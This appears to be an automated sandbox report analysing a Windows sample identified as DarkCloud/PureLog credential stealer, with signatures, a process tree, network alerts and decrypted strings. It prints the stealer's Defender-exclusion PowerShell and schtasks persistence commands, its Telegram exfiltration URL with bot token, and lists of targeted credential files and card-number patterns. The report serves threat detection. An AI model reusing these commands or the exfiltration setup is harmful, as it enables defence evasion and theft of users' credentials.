Windows Analysis Report
oS6KsQIqJxe038Y.exe

Overview

General Information

Sample name: oS6KsQIqJxe038Y.exe
Analysis ID: 1564115
MD5: 4112ac3213933bfc8412b5312d17377f
SHA1: a5db44ae45edadd94dbc4b3e6f2875fa643c43f1
SHA256: b57dfd0e1e8888ec1f8e23e8d8f32409b06367247cef043394a19c7e4f0787fb
Tags: exe, user-TeamDreier

Detection

DarkCloud, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkCloud
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • oS6KsQIqJxe038Y.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe" MD5: 4112AC3213933BFC8412B5312D17377F)
    • powershell.exe (PID: 4484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6008 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • oS6KsQIqJxe038Y.exe (PID: 4676 cmdline: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe" MD5: 4112AC3213933BFC8412B5312D17377F)
      • WmiPrvSE.exe (PID: 6020 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • XgbXowhljC.exe (PID: 5436 cmdline: C:\Users\user\AppData\Roaming\XgbXowhljC.exe MD5: 4112AC3213933BFC8412B5312D17377F)
    • schtasks.exe (PID: 5580 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • XgbXowhljC.exe (PID: 4848 cmdline: "C:\Users\user\AppData\Roaming\XgbXowhljC.exe" MD5: 4112AC3213933BFC8412B5312D17377F)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
DarkCloud Stealer | Stealer is written in Visual Basic. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}
Source | Rule | Description | Author | Strings
0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth | 0x5b14:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |

Source | Rule | Description | Author | Strings
0.2.oS6KsQIqJxe038Y.exe.5600000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.oS6KsQIqJxe038Y.exe.5600000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
0.2.oS6KsQIqJxe038Y.exe.485bd28.2.unpack | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
0.2.oS6KsQIqJxe038Y.exe.485bd28.2.raw.unpack | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |

                    System Summary

                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ProcessId: 4484, ProcessName: powershell.exe
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ProcessId: 4484, ProcessName: powershell.exe
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\XgbXowhljC.exe, ParentImage: C:\Users\user\AppData\Roaming\XgbXowhljC.exe, ParentProcessId: 5436, ParentProcessName: XgbXowhljC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp", ProcessId: 5580, ProcessName: schtasks.exe
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", ProcessId: 6008, ProcessName: schtasks.exe
                    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ProcessId: 4484, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", ProcessId: 6008, ProcessName: schtasks.exe
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-11-27T20:46:40.531766+0100 | 2044741 | 1 | A Network Trojan was detected | 192.168.2.5 | 49758 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:05.735029+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49794 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:07.500213+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49795 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:50.548160+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49802 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:52.799467+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49803 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:46:31.765029+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49740 | 162.55.60.2 | 80 | TCP
                    2024-11-27T20:46:36.371895+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49749 | 162.55.60.2 | 80 | TCP
                    2024-11-27T20:46:39.631508+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49758 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:46:53.237901+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49786 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:46:54.700939+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49788 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:02.820040+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49794 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:06.716060+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49795 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:17.860928+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49798 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:18.897667+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49799 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:48.470477+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49802 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:52.182326+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49803 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:47:57.603930+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49805 | 149.154.167.220 | 443 | TCP
                    2024-11-27T20:48:00.603319+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | TCP

                    AV Detection

                    Source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.raw.unpack, Malware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe, ReversingLabs: Detection: 65%
                    Source: oS6KsQIqJxe038Y.exe, ReversingLabs: Detection: 65%
                    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe, Joe Sandbox ML: detected
                    Source: oS6KsQIqJxe038Y.exe, Joe Sandbox ML: detected
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Cookies
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Password
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \Default\Login Data
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \Login Data
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Password :
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: //setting[@name='Password']/value
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: SMTP Email Address
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: NNTP Email Address
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Email
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: HTTPMail User Name
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: HTTPMail Server
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^389[0-9]{11}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^3[47][0-9]{13}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(6541|6556)[0-9]{12}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^63[7-9][0-9]{13}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(?:2131|1800|35\\d{3})\\d{11}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^9[0-9]{15}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(6304|6706|6709|6771)[0-9]{12,15}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Foxmail.exe
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Mastercard
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(62[0-9]{14,17})$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Visa Card
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Visa Master Card
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \logins.json
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \signons.sqlite
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: mail\
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \Accounts\Account.rec0
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \AccCfg\Accounts.tdat
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: EnableSignature
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Application : FoxMail
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: encryptedUsername
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: logins
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: encryptedPassword
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: Select * from Win32_ComputerSystem
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \Cookies
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \Default\Cookies
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \cookies.sqlite
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \cookies.db
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: \global-messages-db.sqlite
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, String decryptor: C:\\MailMasterData
                    Source: oS6KsQIqJxe038Y.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49758 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49788 version: TLS 1.2
                    Source: oS6KsQIqJxe038Y.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: #]??Y-)\S.PdB source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: W.pdb4 source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Isyl.pdb source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr
                    Source: Binary string: Isyl.pdbSHA256 source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, Code function: 4x nop then jmp 0BF99C82h 0_2_0BF9927E
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe, Code function: 4x nop then jmp 057FB32Ah 11_2_057FA926

                    Networking

                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49758 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49786 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2044741 - Severity 1 - ET MALWARE DarkCloud Stealer File Grabber Function Exfiltrating Data via Telegram : 192.168.2.5:49758 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49788 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49794 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49794 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49795 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49795 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49798 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49802 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49802 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49805 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49803 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49803 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49806 -> 149.154.167.220:443
                    Source: Network traffic, Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49799 -> 149.154.167.220:443
                    Source: unknown, DNS query: name: api.telegram.org
                    Source: unknown, DNS query: name: api.telegram.org
                    Source: Joe Sandbox View, IP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox View, IP Address: 162.55.60.2 162.55.60.2
                    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: unknown, DNS query: name: showip.net
                    Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49740 -> 162.55.60.2:80
                    Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49749 -> 162.55.60.2:80
